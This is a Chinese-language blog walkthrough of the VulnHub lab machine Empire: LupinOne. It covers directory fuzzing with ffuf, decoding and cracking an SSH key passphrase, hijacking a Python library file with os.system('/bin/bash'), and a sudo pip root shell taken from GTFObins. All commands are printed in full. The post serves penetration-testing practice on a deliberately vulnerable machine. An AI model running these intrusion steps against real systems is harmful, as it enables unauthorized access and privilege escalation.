freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

大余每日一攻防EMPIRE: LUPINONE(七)
大余 2023-12-07 10:18:41 142024

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:
环境攻破: 以简单直白的方式攻破每日选择的渗透测试环境。
代码审计: 进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一、网络枚举

1701915361_65712ae198f4ad2da940d.png!small?1701915361999
自动显示IP地址:192.168.253.129

1701915365_65712ae5dceda0f17c390.png!small?1701915367305
仅开启了22和80端口。

二、web信息收集

1701915370_65712aea828143b5901dd.png!small?1701915371220

1701915374_65712aee4c00f072073a9.png!small?1701915374996
发现存在/~myfiles目录:
1701915378_65712af27fe579dc11684.png!small?1701915379145
404访问错误,开启模糊测试!

三、模糊测试

ffuf是一款Go语言编写的高速Web Fuzzer工具:

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.253.129/~FUZZ'

1701915382_65712af6f2ee1099b425e.png!small?1701915384801
访问:

http://192.168.253.129/~secret/

1701915387_65712afb1c637b89c2825.png!small?1701915388677

根据提示信息猜测账户名是icex64,并且告诉我们需要使用fasttrack破解他的密匙,猜测这里存在文件存放了密匙,这里采用ffuf进行扫描:

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.253.129/~secret/.FUZZ' -fc 403 -e .txt,.html

1701915391_65712aff492f78513430a.png!small?1701915393292

获取到.mysecret.txt文件。

四、密码解密

访问访问.mysecret.txt:

http://192.168.253.129/~secret/.mysecret.txt

1701915396_65712b04e1b7b14ff0190.png!small?1701915397980
访问.mysecret.txt文件并对数据进行解密:

https://www.browserling.com/tools/base58-decode

1701915399_65712b07d7ee04a84e4ee.png!small?1701915401776
解密成功,获得密匙。

五、id_rsa密码爆破

用kali自带ssh2john生成密码本:

locate ssh2john
/usr/share/john/ssh2john.py sshkey > hash

1701915405_65712b0d5f2ced1099e0e.png!small?1701915406774

john爆破密码文本:

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

1701915409_65712b1136903cf444cc5.png!small?1701915410819

chmod +x id_rsa
ssh icex64@192.168.253.129 -i id_rsa
P@55w0rd!

1701915413_65712b15147ce21d477b9.png!small?1701915414258

六、水平越权提权

查看下heist文件
1701915417_65712b1971f3a6fec3f37.png!small?1701915418432
发现通过webbrowser打开了一个连接,查找下webbrowser,但是很多显示没有权限,但是这里想到了sudo -l 中使用的是python3.9,命令:

find /usr -name *webbrowser*

1701915421_65712b1d92f026a920d65.png!small?1701915422243
发现webbrowser.py文件:
1701915425_65712b2194f3c95e9f5b8.png!small?1701915426796
1701915430_65712b26739cde6771cf2.png!small?1701915431072
发现是root权限运行的python3的文件,文件中写入shell:

os.system ("/bin/bash")

1701915434_65712b2a57153881ab160.png!small?1701915435284

再用arsene账户调用/home/arsene/heist.py,获取arsene权限:

sudo -u arsene python3.9 /home/arsene/heist.py

1701915439_65712b2f38de7ca59192f.png!small?1701915440048

七、提权

发现存在sudo pip提权漏洞,在gtfobins查找利用方式:
1701915451_65712b3b2424be1ba9c00.png!small?1701915452086

https://gtfobins.github.io/gtfobins/pip/

1701915456_65712b40bc76c0e2f914e.png!small?1701915457633

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

1701915462_65712b467552558b96f5c.png!small?1701915463785
成功获得root权限!

八、代码审计

1701915466_65712b4a9d2150ca51bc4.png!small?1701915468178

1701915471_65712b4ff3373228f9341.png!small?1701915473423
查看源码发现就简单两个html,里面放了一些提示信息罢了,没什么可分析的,明日继续下一个环境。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!


扫描下方二维码添加小助手,进群和大余老师一起技术探讨交流吧!

1701847681_657022811043209291287.png!small?1701847682244

欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

1701847704_65702298ccb7a072cd4c7.png!small?1701847708052

# 漏洞 # 渗透测试 # 网络安全 # web安全 # CTF
本文为 大余 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
大余每日攻防
大余 LV.5
没有网络安全就没有国家安全,VXID:dayuST
  • 91 文章数
  • 1076 关注者
大余每日一攻防EvilBox
2023-12-27
大余每日一攻防SNAKEOIL(十七)
2023-12-26
大余每日一攻防DEATHNOTE-1(十六)
2023-12-25
文章目录